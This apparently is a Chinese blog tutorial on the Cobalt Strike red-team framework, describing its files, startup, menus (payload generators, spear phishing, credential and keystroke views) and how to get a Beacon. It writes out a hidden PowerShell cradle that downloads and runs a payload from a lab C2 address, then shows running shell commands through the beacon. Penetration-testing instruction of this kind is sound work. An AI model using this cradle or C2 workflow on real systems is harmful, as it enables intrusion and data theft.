本文介绍了CobaltStrike的主要文件及其功能,如teamserver、cobaltstrike.jar等,并详细阐述了CobaltStrike的启动步骤、面板和菜单功能,包括如何新建连接、设置偏好、创建监听器等。
拓扑图
CS文件说明
| 文件名 | 解释 |
|---|---|
| agscript | 展应用的脚本。 |
| c2lint | 用于检查profile 的错误和异常。 |
| teamserver | 团队服务器程序。 |
| cobaltstrike 和 cobaltstrike.jar | 客户端程序。因为teamserver文件是通过Java来调用CobaltStrike 的,所以直接在命令行环境中输入第一个文件的内容也能启动Cobalt Strike 客户端 (主要是为了方便操作)。 |
| logs | 日志,包括 Web日志、Beacon日志、截图日志、下载日志、键盘记录日志等。 |
| datas | 用于保存当前TeamServer的一些数据。 |
| update 和 update.jar | 用于更新Cobalt Strike。 |
1.启动方式
- 准备Java环境
- 启动服务器端,并设置服务器IP和密码
- 启动客户端
- 填写团队服务器的
IP地址、端口号、用户名、密码。用户名任意,但要保证其没有被用来登录Cobalt Strike服务器。(首次连接会进行指纹检验)
2.面板介绍
3.菜单说明
- Cobalt Strike 模块
New Connection:打开一个新的”Connect”窗口。在当前窗口中新建一个连接,即可同时连接不同的团队服务器( 便于团队之间的协作)。Preferences:偏好设置,首选项,用于设置Cobalt Strike主界面、控制台、TeamServer 连接记录、报告的样式。Visualization:将主机以不同的权限展示出来(主要以输出结果的形式展示)。VPN Interfaces:设置VPN接口。Listeners:创建监听器。Script Manager:查看和加载CNA脚本。Close:关闭当前与TeamServer的连接。
- View 模块
Applications:显示被控机器的应用信息。Credentials:通过HashDump或mimikatz获取的密码或者散列值都储存在这里。Downloads:从被控机器中下载的文件。Event Log:主机上线记录,以及与团队协作相关的聊天记录和操作记录。Keystrokes:键盘记录。Proxy Pivots:代理模块。Screenshots:屏幕截图模块。Script Console:控制台,在这里可以加载各种脚本。(链接)Targets:显示目标。Web Log:Web 访问日志。
- Attacks 模块
-
Packages
HTML Application:基于HTML应用的Payload模块,通过HTML调用其他语言的应用组件进行攻击测试,提供了可执行文件、PowerShell、 VBA三种方法。MS Office Macro:生成基于Office病毒的Payload 模块。Payload Generator:Payload 生成器,可以生成基于C、C#、COM Scriptlet、 Java、 Perl、 PowerShell、Python、 Ruby、 VBA等的Payload。USB/CD AutoPlay:用于生成利用自动播放功能运行的后门文件。Windows Dropper:捆绑器,能够对文档进行捆绑并执行Payload。Windows Executable:可以生成32位或64位的EXE和基于服务的EXE、DLL等后门程序。在32位的Windows操作系统中无法执行64位的Payload,而且对于后渗透测试的相关模块,使用32位和64位的Payload会产生不同的影响,因此在使用时应谨慎选择。Windows Executable (S):用于生成一个Windows 可执行文件,其中包含Beacon的完整Payload,不需要阶段性的请求。与Windows Executable模块相比,该模块额外提供了代理设置,以便在较为苛刻的环境中进行渗透测试。该模块还支持PowerShell脚本,可用于将Stageless Payload注入内存。
-
Web Drive-by
Manage:管理器,用于对TeamServer上已经开启的Web服务进行管理,包括 Listener 及 Web Delivery模块。Clone Site:用于克隆指定网站的样式。Host File:用于将指定文件加载到Web目录中,支持修改Mime Type。Script Web Delivery:基于Web的攻击测试脚本,自动生成可执行的Payload。Signed Applet Attack:使用Java自签名的程序进行钓鱼攻击测试。如果用户有Applet 运行权限,就会执行其中的恶意代码。Smart Applet Attack:自动检测Java的版本并进行跨平台和跨浏览器的攻击测试。该模块使用嵌入式漏洞来禁用Java的安全沙盒。可利用此漏洞的Java版本为1.6.0_45以下及1.7.0 _21以下。System Profiler:客户端检测工具,可以用来获取一些系统信息,例如系统版本、浏览器版本、Flash版本等。
-
spear phish 模块
鱼叉式网络钓鱼
- Reporting 模块
0.activity report:活动报告生成。1.Hosts report:主机报告。2.Indicators of Compromise:目标报告。3.Sessions report:会话报告。4.Social engineering report:社会工程学报告。5.Tactics,Techniques,and Procedures:战术技术和步骤Reset Data:重置数据。Export data:数据出口。
4.获取一个Beacon
- 打开listener
- 新建监听器
- 创建payload
复制payload到目标执行:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.8.34:80/a'))"
目标主机成功上线,并可以看到靶机的外网IP地址,内网IP地址、监听器、用户名、机器名、是否有特权、Beacon进程的PID、心跳时间等信息:
4. 执行shell命令
- 右键interact
- 在beacon>输入shell whoami执行whoami命令(默认回连时间是1min)
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
